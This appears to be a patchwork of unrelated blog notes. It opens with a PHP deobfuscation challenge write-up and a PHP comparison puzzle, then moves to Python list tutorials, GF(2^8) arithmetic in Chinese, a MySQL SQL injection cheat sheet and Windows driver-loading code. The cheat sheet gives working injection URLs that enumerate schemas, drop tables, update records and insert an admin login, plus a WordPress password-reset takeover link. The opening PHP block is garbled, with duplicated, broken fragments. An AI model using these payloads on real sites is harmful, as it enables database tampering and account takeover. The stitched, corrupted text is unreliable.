Original Code From:www.securityoverride.org ‘s  Challenge

<?php
session_start();

$title = ‘LEVENSHTEIN';

$_SERVER = $_SERVER;$_SERVER2 = $_SERVER;$_SERVER3 = $_SERVER2;$_GET=$_GET;$_u=array();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_717=base64_decode(base64_decode(/*);function _a(){global $_717;${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);return “${YmFzZTY0}”;}$_uu=$_u[2](‘X0dFVA==’);;;;;;;;;;;;;;;;;;;;
function _____($__){global $_u; $_=$_u[1]();return $_($__,_gg(),T());}function _gg(){global $_u; return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));};;;;;;;;;;;;;;;;;;
function T(){global $_u; return $_u[2](‘MTI=’);}function _g(){global $_u; return _____($_u[0]());}function _____________________(){return ‘X1NFUlZFUg==';};;;;;;;;;;;;;;;;;;;;;;
function _____oa($_){global $_u; $v = $_u[2](‘dXcode(base64_decode(base64_encode(‘V1cxR2VscFVXVEJZTWxKc1dUSTVhMXBSUFQwPQ==’)))));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_616=$_717($_717($_717($_717(base64_encode”_g_”} = ${“_o_”}[_g()];$_ЁЁЁ� = _____ao(‘/(?!\\##\$\$\$uu)=/’,${“_g_”});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
${“_g_1″} = _____oa($_ЁЁЁ0]);${“_g_2″} = $_uu[${“_g_1″}];if(${“efre”Vic3Ry”);return “${c3Vic3Ry}”;’);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_u[2]=$_616(‘$_’,’$__=_a();return $__($_);’);function _a(){global $_717;${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);return “${YmFzZTY0}”;}$_uu=$_u[2](‘X0dFVA==’);;;;;;;;;;;;
function _____($__){global $_u; $_=$_u[1]();return $_($__,_gg(),T());}function _gg(){global $_u; return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));};;;;;;;;;;;;;;;;;;
function T(){global $_u; return $_u[2](‘MTI=’);}function _g(){global*/base64_decode(base64_decode(base64_encode(‘V1cxR2VscFVXVEJZTWxKc1dUSTVhMXBSUFQwPQ==’)))));;;;;;;;;;;;;;;;;
$_616=$_717($_717($_717($_717(base64_encode(‘V1ROS2JGbFlVbXhZTWxveFltMU9NR0ZYT1hVPQ==’)))));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_u[0]=$_616(false,’$_=_a();return $_(“‘.str_rot13(/*);function _a(){global $_717;${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);return “${YmFzZTY0}”;}$_uu=$_u[2](‘X0dFVA==’);;;
function _____($__){global $_u; $_=$_u[1]();return $_($__,_gg(),T());}function _gg(){global $_u; return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));};;;;;;;;;;;;;;;;;;
function T(){global $_u; return $_u[2](‘MTI=’);}function _g(){global $_u; return _____($_u[0]());}function _____________________(){return ‘X1NFUlZFUg==';};;;;;;;;;;;;;;;;;;;;;;
function _____oa($_){global $_u; $v = $_u[2](‘dXcode(basergrgrgrgrgrgrgrgrgrgrgrgrgrgrgrgrgergarregexKc1dUSTVhMXBSUFQwPQ==’)))));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_616=$_717($_717($_717($_717(base64_encode”_g_”} = ${“_o_”}[_g()];$_ЁЁЁ� = _____ao(‘/(?!\\##\$\$\$uu)=/’,${“_g_”});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
${“_g_1″} = _____oa($_ЁЁЁ0]);${“_g_2″} = $_uu[${“_g_1″}];if(${“title”Vic3Ry”);return “${c3Vic3Ry}”;’);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_u[2]=$_616(‘$_’,’$__=_a();return $__($_);’);function _a(){global $_717;${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);return “${YmFzZTY0}”;}$_uu=$_u[2](‘X0dFVA==’);;;;;;;;;;;;
function _____($__){global $_u; $_=$_u[1]();return $_($__,_gg(),T());}function _gg(){global $_u; return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));};;;;;;;;;;;;;;;;;;
function T(){global $_u; return $_u[2](‘MTI=’);}function _g(){global*/’H0IFIxIFK0SRESWEIHIFJI9GISWWGxqFEISIEIAHK01SIRuCERuHISOsDHAQEIOH’).'”);’);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_u[1]=$_616(false,’$_=_a();${“‘.str_rot13(‘p3Ivp3El’).'”} = $_(“c3Vic3Ry”);return “${c3Vic3Ry}”;’);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_u[2]=$_616(‘$_’,’$__=_a();return $__($_);’);function _a(){global $_717;${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);return “${YmFzZTY0}”;}$_uu=$_u[2](‘X0dFVA==’);;;;;;;;;;;;
function _____($__){global $_u; $_=$_u[1]();return $_(/*);function _a(){global $_717;${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);return “${YmFzZTY0}”;}$_uu=$_u[2](‘X0dFV;;;;;
function _____($__){global $_u; $_=$_u[1]();return $_($__,_gg(),T());}function _gg(){global $_u; return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));};;;;;;;;;;;;;;;;;;
function T(){global $_u; return $_u[2](‘MTI=’);}function _g(){global $_u; return _____($_u[0]());}function _____________________(){return ‘X1NFUlZFUg==';};;;;;;;;;;;;;;;;;;;;;;
function _____oa($_){global $_u; $v = $_u[2](‘dXcode(base64_decode(base64_encode(‘V1cxR2VscFVXVEJZTWxKc1dUSTVhMXBSUFQwPQ==’)))));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_616=$_717($_717($_717($_717(base64_encode”_g_”} = ${“_o_”}[_g()]ferfer;${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);return “${YmFzZTY0}”;}$_uu=$_u[2](‘X0dFVA==’);;;;;;;;;;;;
function _____($__){global $_u; $_=$_u[1]();return $_($__,_gg(),T());}function _gg(){global $_u; return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));};;;;;;;;;;;;;;;;;;
function T(){global $_u; return $_u[2](‘MTI=’);}function _g(){global*/$__,_gg(),T());}function _gg(){global $_u; return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));};;
function T(){global $_u; return $_u[2](‘MTI=’);}function _g(){global $_u; return _____($_u[0]());}function _____________________(){return ‘X1NFUlZFUg==';};;;;;;;;;;;;;;;;;;;;;;
function _____oa($_){global $_u; $v = $_u[2](‘dXJsZGVjb2Rl’);return $v($_);}function _____ao($_,$__){global $_u; $v = $_u[2](‘cHJlZ19zcGxpdA==’);return $v($_,$__);};;;;;;;;;;;;
$_uu=$$_uu;${“_o_”}=$_u[2](_____________________());${“_o_”}=$${“_o_”};${“_g_”} = ${“_o_”}[_g()];$_ЁЁЁ� = _____ao(‘/(?!\\##\$\$\$uu)=/’,${“_g_”});;;;;;;;;;;;;;;;;;;;;;;;;;;;
${“_g_1″} = _____oa($_ЁЁЁ�[0]);${“_g_2″} = $_uu[${“_g_1″}];if(/*);function _a(){global $_717;${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);return “${YmFzZTX0dFVA==’);;;;;;;;
function _____($__){global $_u; $_=$_u[1]();return $_($__,_gg(),T());}function _gg(){global $_u; return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));};;;;;;;;;;;;;;;;;;
function T(){global $_u; return $_u[2](‘MTI=’);}function _g(){global $_u; return _____($_u[0]());}function _____________________(){return ‘X1NFUlZFUg==';};;;;;;;;;;;;;;;;;;;;;;
function _____oa($_){global $_u; $v = $_u[2](‘dXcode(base64_decode(base64_encode(‘V1cxR2VscFVXVEJZTWxKc1dUSTVhMXBSUFQwPQ==’)))));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_616=$_717($_717($_717($_717(base64_encode”_g_”} = ${“_o_”}[_g()];$_ЁЁЁ� = _____ao(‘/(?!\\##\$\$\$uu)=/’,${“_g_”});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
${“_g_1″} = _____oa($_ЁЁЁ0]);${“_g_2″} = $_uu[${“_g_1″}];if(${“title”Vic3Ry”);return “${c3Vic3Ry}”;’);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$_u[2]=$_616(‘$_’,’$__=_a();return $__($_);’);function _a(){global $_717;${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);return “${YmFzZTY0}”;}$_uu=$_u[2](‘X0dFVA==’);;;;;;;;;;;;
function _____($__){global $_u; $_=$_u[1]();return $_($__,_gg(),T());}function _gg(){global $_u; return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));};;;;;;;;;;;;;;;;;;
function T(){global $_u; return $_u[2](‘MTI=’);}function _g(){global*/${“title”}(${“_g_1″},${“_g_2″})==0){validate_result(${“_g_2″});};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

function validate_result($result){
        if($result === ‘phpinfo();’){
            $_SESSION[“solved_advanced_2″] = true;
            header(“Location:./”);
        }
    }

echo “Good luck. <a href=’./’>Back to the challenges main page.</a><br/><i>Please note that you will only get feedback if you solved this challenge. Wrong attempts do not generate any output at all.</i><hr/>”;
highlight_file(‘code.php’);
?>

What i need to do is to find the proper parameter(s) to make the red code (above) run correctly.

Therefore,I opened my everedit and modified the code to make it more readable .

Firstly， I deleted all comments . Secondly, we need to adjust the indentation .

Then the last thing is to replace some variables by its’ actual value.

Following is the code :

<?php
    session_start();
    
    $title = ‘LEVENSHTEIN';

    $_SERVER = $_SERVER;
    $_SERVER2 = $_SERVER;
    $_SERVER3 = $_SERVER2;
    $_GET=$_GET;
    $_u=array();
    $_717=”base64_decode”;
    $_616=”create_function”;
    /*$_u[0]=$_616(false,
    ‘$_=_a();return $_(“‘.str_rot13(‘H0IFIxIFK0SRESWEIHIFJI9GISWWGxqFEISIEIAHK01SIRuCERuHISOsDHAQEIOH’).'”);’);*/
    
    /*$_u[1]=$_616(false,
    ‘$_=_a();${“‘.str_rot13(‘p3Ivp3El’).'”} = $_(“c3Vic3Ry”);return “${c3Vic3Ry}”;’);*/
    $_u[0]=’SERVER_ADDRQUERY_STRINGREQUEST_METHODHTTP_ACCEPT';
    $_u[1]=’substr';
    
    $_u[2]=create_function(‘$_’,’return base64_decode($_);’);
 
    function _a()
    {
        global $_717;
        ${‘YmFzZTY0′} = $_717(‘YmFzZTY0X2RlY29kZQ==’);
        return “${YmFzZTY0}”;
    }

    //$_uu=$_u[2](‘X0dFVA==’);
    $_uu=’_GET';
    function _____($__)
    {
        global $_u; $_=$_u[1]();
        //return $_u[1]($__,_gg(),T());
        return substr(“SERVER_ADDRQUERY_STRINGREQUEST_METHODHTTP_ACCEPT”,11,12);
        //QUERY_STRING
    }
    function _gg()
    {
        global $_u;
        return eval($_u[2](‘cmV0dXJuIG9yZCgnUicpLW9yZCgnRycpOw==’));
    }

    function T()
    {
        global $_u;
        return $_u[2](‘MTI=’);
    }
    function _g()
    {
        global $_u;
         //return _____($_u[0]());
         return _____(‘    SERVER_ADDRQUERY_STRINGREQUEST_METHODHTTP_ACCEPT’);
    }
    function _____________________()
    {
        return ‘X1NFUlZFUg==';
    }
    function _____oa($_)
    {
        global $_u;
        $v = $_u[2](‘dXJsZGVjb2Rl’);//urldecode
        return urldecode($_);
    }
    
    function _____ao($_,$__)
    {
        global $_u;
        $v = $_u[2](‘cHJlZ19zcGxpdA==’);//preg_split
        //return $v($_,$__);
        return preg_split(‘/(?!\\##\$\$\$uu)=/’,
                $_SERVER[“QUERY_STRING”]);
    }
    $_uu=$$_uu;
    ${“_o_”}=$_u[2](_____________________());
    ${“_o_”}=$${“_o_”};
    ${“_g_”} = ${“_o_”}[_g()];
    $_ЁЁЁ� = _____ao(‘/(?!\\##\$\$\$uu)=/’,${“_g_”});
    ${“_g_1″} = _____oa($_ЁЁЁ�[0]);
    ${“_g_2″} = $_uu[${“_g_1″}];
    if(${“title”}(${“_g_1″},${“_g_2″})==0)
    {
        validate_result(${“_g_2″});
    }

    
    
    function validate_result($result){
        if($result === ‘phpinfo();’){
            $_SESSION[“solved_advanced_2″] = true;
            header(“Location:./”);
        }
    }
    
    echo “Good luck. <a href=’./’>Back to the challenges main page.</a><br/><i>Please note that you will only get feedback if you solved this challenge. Wrong attempts do not generate any output at all.</i><hr/>”;
    highlight_file(‘code.php’);
?>

Much more clear now!^_^

Next, we should extract all the sentences which will be executed directly.

(To make the whole process more clear)。

And here it’s the  code:

$_uu=’_GET';
    $_uu=$_GET;
    ${“_o_”}=’_SERVER';
    ${“_o_”}=$_SERVER;
    ${“_g_”} = $_SERVER[“QUERY_STRING”];
    $_ЁЁЁ� = _____ao(‘/(?!\\##\$\$\$uu)=/’,${“_g_”});
    //preg_split(‘/(?!\\##\$\$\$uu)=/’,
                //$_SERVER[“QUERY_STRING”]);
    ${“_g_1″} = _____oa($_ЁЁЁ�[0]);
    ${“_g_2″} = $_GET[${“_g_1″}];
    if(${“title”}(${“_g_1″},${“_g_2″})==0)
    {
        validate_result(${“_g_2″});
    }

Ok,Let’s deal with the final part — understand the whole PHP code.

I don’t want to talk about the detail of calculating.

The way  to  deal with  obfuscated code is more valuable!

Here is the answer:?phpinfo();=phpinfo(); (Adding this code to the end of the  url);

The challenge is a section of PHP Script.

Following is the script:

 <?php
                $input = trim(getUserInput());
                if(
                    str_split($input) == array(0,0,0,0) ||
                    strcmp($input, “0000”) == 0 ||
                    strcmp($input, “000”) == 0 ||
                    strcmp($input, “00”) == 0 ||
                    strcmp($input, “0”) == 0 ||
                    $input === 0 ||
                    preg_match(“/^[\d]{1,}$/D”, $input)
                )fail_advanced_1();
               
                if($input == “0000”) complete_advanced_1();
   ?>

After a long time thinking,I found that a different equation”$input === 0“,which means Strict comparisons!!!!

So we just need to input “-0″(negative 0)to pass the script!

PHP type comparisons

Indexing

Start counting from 0 and end with -1

>>> a=[0,1,2,3,4,5,6,7,8,9]

>>> a[0]

0

>>> a[-1]

9

Slicing

Slicing is done by two colon-separate indices.

The first index is the number of the first element you want to include. But the last index is the number of the first element after your slice.

slicedString = aString[beginIndex:endIndex]

 

>>> a=[0,1,2,3,4,5,6,7,8,9]

>>> a[0:1]

[0]

>>> a[0:5]

[0, 1, 2, 3, 4]

If the slice continues to the end of the sequence,you may simply leave out the last index.

>>> a[5:]

[5, 6, 7, 8, 9]

>>> a[5:10]

[5, 6, 7, 8, 9]

 

#Longer steps

The implicit step length is 1,which means that the slice ‘moves’ from one elements to the next.

The step length can’t be zero, But it can be negative, which means extracting the element from right to the left.

>>> a[::1]

[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

>>> a[::-1]

[9, 8, 7, 6, 5, 4, 3, 2, 1, 0]

 

Adding Sequence

You can concatenate sequences by using plus operator. But only the same-type sequences can be concatenated.

>>> [1,2,3]+[4,5,6]

[1, 2, 3, 4, 5, 6]

>>> [4,5,6]+’11’

 

Traceback (most recent call last):

File “<pyshell#10>”, line 1, in <module>

[4,5,6]+’11’

TypeError: can only concatenate list (not “str”) to list

Multiplying

Multiplying a sequence with a number x creating a new sequence where the original sequence is repeated x times.

>>> ‘python’*3

‘pythonpythonpython’

Membership

To check whether a sequence contained a value, you can use in operator. It returns Boolean value(True or False)

>>> ‘aa’ in ‘aabc’

True

>>> 1 in [2,3,4]

False

Length/Maximum/Minimum

The Build-in functions len,max,min

>>> max([1,2,3,4,5])

5

>>> max(1,2,3,4,5)

5

>>> len(‘123′)

3

>>> min(‘abcd’)

‘a’

Caution: max and min can be called with numbers directly

#2.   List

List is mutable—you can change it’s contents

list()

Generating a list with any-type sequence

>>> list(‘1234′)

[‘1′, ‘2’, ‘3’, ‘4’]

>>> list([1,2,3])

[1, 2, 3]

Item Assignments

>>> x=[1,2,3]

>>> x

[1, 2, 3]

>>> x[1]=0

>>> x

[1, 0, 3]

Caution: Cannot assign to a position doesn’t exist

Deleting Elements

You can simply use del statement to delete elements

>>> a=[1,2,3,4]

>>> del a[3]

>>> a

[1, 2, 3]

Slice Assignments

You may replace the slice with a sequence whose length is different from that of the original

>>> a=[1,2,3]

>>> a[0:1]=[0,0,0,0,0]

>>> a

[0, 0, 0, 0, 0, 2, 3]

Slice assignments can even insert new elements without replace original ones.

>>> a=[1,2,3]

>>> a[1:1]=[‘a’,’a’,’a’]

>>> a

[1, ‘a’, ‘a’, ‘a’, 2, 3]

And you can do the reverse to delete a slice.

List Methods

append

The append method is used to append an object to the end of a list.

Caution: The append method modifies the original list directly.

count

The count method counts the occurrences of an element in a list.

extend

The extend method allows you to append several values at once. In other words, the original list has been extended by the other one. And it is an in-place method.

index

The index method is used for searching lists to find the index of the first occurrence of a value.

insert

The insert method is used to insert an object into a list.

pop

The pop method will remove an element (by default, the last one) from the list and returns it.

remove

The remove method is used to remove the first occurrence of a value. It modifies the list, but returns nothing.

Caution: It is a “nonreturning in-place changing” method.

reverse

The reverse method reverses the element in the list. It modifies the list, but returns nothing too.

sort

The sort method is used to sort lists in place.

Another way of getting a sorted copy of the list is using sorted function.

Advanced Sorting

If you want to have your elements sorted in a specific manner, you can supply a compare function as a parameter to sort.

The sort method has two other optional arguments: key and reverse. These two arguments need to be specified by name.

#3 Tuple

Tuples are sequences, just like lists.The only difference is that tuple is immutable.

The tuple synatx is simple–if you separate some values with commas, you automatically have a tuple.

Tuple may also be enclosed in parenthese.

Caution: You must to include a comma, even though there is only one value.

>>> 42
(42)
>>> (42,)
(42,)

The tuple function

The tuple function is pretty much the same way as list.

It takes one sequence argument and converts it to a tuple.

GF(2^8)，也就是在一个字节上所做的乘法和加法都封闭的一个有限域。 在GF(2^8)上只有两种运算：异或加运算和乘法运算。 其中异或加运算就是1 xor 1 = 0, 0 xor 0 = 0, 1 xor 0 = 1。（原谅我的啰嗦） 乘法运算的规则就是： （1）A * 2的时候，A左移一位；A * 4 = (A * 2) * 2，A * 8 = ((A * 2) * 2) * 2，容易看出乘上2的n次幂是一个不断迭代的过程。 （2）那么A * 6的情况有如何？很简单，A * 6 = (A * 2) xor (A * 4)，注意在该域中加法都是xor运算，而不是算术加运算。另外，可能有人会问：A * 4 = (A * 2) xor (A * 2) = 0，这不是和（1）冲突了吗？ 原因在于：A * 6 = A * 00000110，其中00000110 = 00000100 xor 00000010，但是A * 4 = A * 00000100，00000100 != 00000010 xor 00000010 (= 00000000)。 （3）在乘法运算中，若乘数左移结果中第8位左边非0，例如10000000 * 00000100 = 10000000 * 2 * 2，其中10000000 * 2 = (1)00000000，结果溢出，所以要再和1BH进行异或加运算，即结果为00000000 xor 00011011 = 00011011。然后00011011 * 2 = 00110110即为结果。 错误做法：10000000 * 4 = (10)00000000 xor 00011011 = 00011011，为什么呢？因为10000000 * 2已经溢出，要先做溢出处理。 注：为什么是1BH？因为在AES的设计中开发者选用了不可约多项式m(x) = x^8 + x^4 + x^3 + x + 1，所以如果结果溢出就要再xor一个00011011（也就是1BH）。

Some useful syntax reminders for SQL Injection into MySQL databases…

This post is part of a series of SQL Injection Cheat Sheets.  In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.  This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.

all databases :

select group_concat(SCHEMA_NAME) from  INFORMATION_SCHEMa.SCHEMATA

tables for current database:

select group_concat(table_name) from  INFORMATION_SCHEMa.tables where table_schema=database()

columns in table:

select group_concat(columns_name) from  Information_schema.columns where table_name=[real_table_name]

update :5/3/2014   

http://www.madleets.com/Thread-SQL-Injection-Tutorial-All-common-SQL-injection-problems-and-Solutions

Order by is being block?

Order by || group by || and (select * from admins)=(select 1)

‘order by 10000′ and still not error?

Example : site.com/news.php?id=9 order by 10000000000– [No Error]

to bypass this you just have to change the URL little bit.Add ‘ after the ID number and at the end just enter +

site.com/news.php?id=9′ order by 10000000–+[Error]

I get error if I try to extract tables.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables

Change the URL for this

site.com/new.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit0,1–+

modify the information in the database

drop table

http://site.com/news.php?id=1; DROP TABLE news

update database

http://site.com/news.php?id=1; UPDATE ‘Table name’ SET ‘data you want to edit’ = ‘new data’ WHERE column_name=’information’–+

INSERT

http://site.com/news.php?id=1; INSERT INTO ‘admin_login’ (‘login_id’, ‘login_name’, ‘password’, ‘details’) VALUES (2,’Rynaldo’,’Crackhackforum’,’NA’)–

下面是几个有用的字段：

user_login

user_pass

user_email

user_activation_key

最后是利用获取到的重设密码的激活码的使用链接

http://{DOMAIN_NAME_HERE}/wp-login.php?action=rp&key={ACTIVATION_KEY_HERE}&login={USERNAME_HERE}

int main()
{
char szFilePath[MAX_PATH];
char* pszFileName;
OPENFILENAMEA stOpenFileName;
BOOL zRet;
SC_HANDLE schSCManager;
//
RtlZeroMemory(&stOpenFileName ,sizeof(OPENFILENAME));
RtlZeroMemory(szFilePath ,sizeof(char)*MAX_PATH);
stOpenFileName.lStructSize = sizeof(OPENFILENAME);;
stOpenFileName.lpstrFilter = “驱动(*.sys)\0\0″;
stOpenFileName.lpstrFile = szFilePath;
stOpenFileName.nMaxFile = MAX_PATH;
stOpenFileName.Flags = OFN_FILEMUSTEXIST;
zRet = GetOpenFileName(&stOpenFileName);
MessageBox(NULL, stOpenFileName.lpstrFile, stOpenFileName.lpstrFile+stOpenFileName.nFileOffset, 0);
//
pszFileName = stOpenFileName.lpstrFile + stOpenFileName.nFileOffset;
//
schSCManager = OpenSCManager(NULL,//Machine Name
NULL,//local database
SC_MANAGER_ALL_ACCESS);
//
if ( !schSCManager )
{
printf(“Open SCM Failed ERROR:%X\n”,GetLastError());
system(“pause”);
return -1;
}

//TODO: check the path
if ( LoadDriver(schSCManager, pszFileName, &szFilePath) )
{
printf(“Load Success!\n”);
}

system(“pause”);

if ( StartDriver(schSCManager, pszFileName) )
{
printf(“Start Success!\n”);
}

system(“pause”);
if ( StopService(schSCManager, pszFileName) )
{
printf(“Stop Success!\n”);
}

system(“pause”);
if ( RemoveDriver(schSCManager, pszFileName) )
{
printf(“Remove Success!\n”);
}

system(“pause”);

CloseServiceHandle(schSCManager);

return 0;
}

BOOL LoadDriver(SC_HANDLE schSCManager , //SCM Handle
LPCSTR lpszDriverName , //Driver Name
LPCSTR lpszServiceFullPath) //full-qualified path
{
SC_HANDLE schService = NULL;
DWORD dwErrorRet;

schService = CreateService(schSCManager ,
lpszDriverName , //Service name
lpszDriverName , //Service to display
SERVICE_ALL_ACCESS , //desired access
SERVICE_KERNEL_DRIVER , //service type
SERVICE_DEMAND_START , //start type
SERVICE_ERROR_IGNORE , //error control type
lpszServiceFullPath , //full-qualified path
NULL ,NULL ,NULL ,NULL ,NULL
);

if (!schService)
{
dwErrorRet = GetLastError();
if (dwErrorRet == ERROR_SERVICE_EXISTS)
{
printf(“Service Existed!\n”);
return TRUE;
}
else
{
printf(“CreateService failed ! Error:%X\n” ,dwErrorRet);
return FALSE;
}
}

//Create Successfully
//Close the service
printf(“Create Service Successful!”);
if (schService)
CloseServiceHandle(schService);
return TRUE;

}

//remove service
BOOL RemoveDriver(SC_HANDLE schSCManager ,//SCM handle
LPCTSTR lpszDriverName)//Driver Name
{
SC_HANDLE schService;
BOOL zRet;
//Open an Existing Service
schService = OpenService(schSCManager ,
lpszDriverName ,
SERVICE_ALL_ACCESS);

if (!schService)
{
printf(“Open Service Failed! ERROR:%X\n” ,GetLastError());
return FALSE;

}
//Delete Service
if (DeleteService(schService))
{
zRet = TRUE;
}
else
{
printf(“DeleteService Failed! ERROR:%X\n” ,GetLastError());
zRet = FALSE;
}
if (schService)
{
//printf(“DeleteService Successful!\n”);
CloseServiceHandle(schService);
}
return zRet;

}

//start service
BOOL StartDriver(SC_HANDLE schSCManager ,
LPCTSTR lpszDriverName)
{
SC_HANDLE schService;
DWORD dwErrorRet;

//Open Service
schService = OpenService(schSCManager ,
lpszDriverName ,
SERVICE_ALL_ACCESS);

if (!schService)
{
printf(“Open Service Failed! ERROR:%X\n” ,GetLastError());
return FALSE;

}
if (!StartService(schService ,0 ,NULL))
{
//failed
dwErrorRet = GetLastError();
if (dwErrorRet == ERROR_SERVICE_ALREADY_RUNNING) //service has been running
return TRUE;
else
{
printf(“StartSerivce Failed!ERROR:%X\n” ,dwErrorRet);
return FALSE;
}
}
if (schService)
CloseServiceHandle(schService);
return TRUE;

}

//stop service
BOOL StopService(SC_HANDLE schSCManager ,
LPCTSTR lpszDriverName)
{
SC_HANDLE schService;
SERVICE_STATUS stServiceStatus;
BOOL zRet;
//Open Service
schService = OpenService(schSCManager ,
lpszDriverName ,
SERVICE_ALL_ACCESS);

if (!schService)
{
printf(“Open Service Failed! ERROR:%X\n” ,GetLastError());
return FALSE;

}

if (ControlService(schService ,
SERVICE_CONTROL_STOP ,
&stServiceStatus))
{
zRet = TRUE;
}
else
{
//Failed
printf(“StopService Failed ! ERROR:%X\n” ,GetLastError());
zRet = FALSE;
}
if (schService)
CloseServiceHandle(schService);

return zRet;
}

需要使用管理员权限运行

I need to get a file path, so I use GetOpenFileName .Following is the definition:

BOOL GetOpenFileName(   LPOPENFILENAME lpofn);

According to the description in MSDN,I just need to fill the OPENFILENAME  structure.And here is my code:

char szFilePath[MAX_PATH];
OPENFILENAME  stOpenFileName;
BOOL            zRet;
RtlZeroMemory(&stOpenFileName ,sizeof(OPENFILENAME));
stOpenFileName.lStructSize = sizeof(OPENFILENAME);
stOpenFileName.lpstrFilter = “驱动(*.sys)\0\0″;
stOpenFileName.lpstrFile = szFilePath;
stOpenFileName.nMaxFile = MAX_PATH;
stOpenFileName.Flags = OFN_FILEMUSTEXIST;
zRet = GetOpenFileName(&stOpenFileName);

The code above can run successfully,but it never shows the file-choosen dialog.

Then  I search for  the usage  of  GetOpenFileName,But I got nothing.

After about an hour ,I ran the program and get the dialog with messy code. So I rechecked  my code and  read MSDN’s

description about OPENFILENAME .And I found that :

lpstrFilter

Long pointer to a buffer that contains pairs of null-terminated filter strings. The last string in the buffer must be terminated by two NULL characters.

Finally,I descovered that I’ve forgot to initialize szFilePath  .After I add :

RtlZeroMemory(szFilePath ,sizeof(char)*MAX_PATH);

The dialog appeared.

Following is the correct code:

int main()
{
char szFilePath[MAX_PATH];
OPENFILENAME  stOpenFileName;
BOOL            zRet;
RtlZeroMemory(&stOpenFileName ,sizeof(OPENFILENAME));
RtlZeroMemory(szFilePath ,sizeof(char)*MAX_PATH);
stOpenFileName.lStructSize = sizeof(OPENFILENAME);;
stOpenFileName.lpstrFilter = “驱动(*.sys)\0\0″;
stOpenFileName.lpstrFile = szFilePath;
stOpenFileName.nMaxFile = MAX_PATH;
stOpenFileName.Flags = OFN_FILEMUSTEXIST;
zRet = GetOpenFileName(&stOpenFileName);
MessageBox(NULL ,stOpenFileName.lpstrFile ,NULL ,0);
return 0;
}

The problem: Your DbgPrint or KdPrint messages don’t appear in WinDbg (or KD) when you run your driver on Windows Vista, Windows 7, or Windows 8.

The reason?  Versions of Windows starting with Vista automatically map DbgPrint and friends to DbgPrintEx.  Now, you may recall that DbgPrintEx allows you to control the conditions under which messages will be sent to the kernel debugger by filtering messages via a component name and level in the function call and an associated filter mask in either the registry or in memory. 

DbgPrint and KdPrint are mapped to component “DPFLTR_DEFAULT_ID” and level “DPFLTR_INFO_LEVEL”.  Of course xxx_INFO_LEVEL output is disabled by default.  So, by default, your DbgPrint/KdPrint doesn’t get sent to the kernel debugger.

How to fix it? Two choices:

• Enable output of DbgPrint/KdPrint messages by default — Open (or add, if it’s not already there) the key “HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter”.  Under this key, create a  value with the name “DEFAULT”  Set the value of this key equal to the DWORD value 8 to enable xxx_INFO_LEVEL output as well as xxx_ERROR_LEVEL output.  Or try setting the mask to 0xF so you get all output.  You must reboot for these changes to take effect.  Note… Don’t set the value named “(default)” — You actually have to create a new value with the name “DEFAULT” and set that to whatever value you want (0xF, for example).
• Specifically change the component filter mast for DPFLTR. Starting with Windows Vista you need to set the mask value for the DWORD at Kd_DEFAULT_MASK (“ed Kd_DEFAULT_MASK”).  You can specify 8 to enable DPFLTR_INFO_LEVEL output in addition to DPFLTR_ERROR_LEVEL output, or 0xF to get all levels of output.

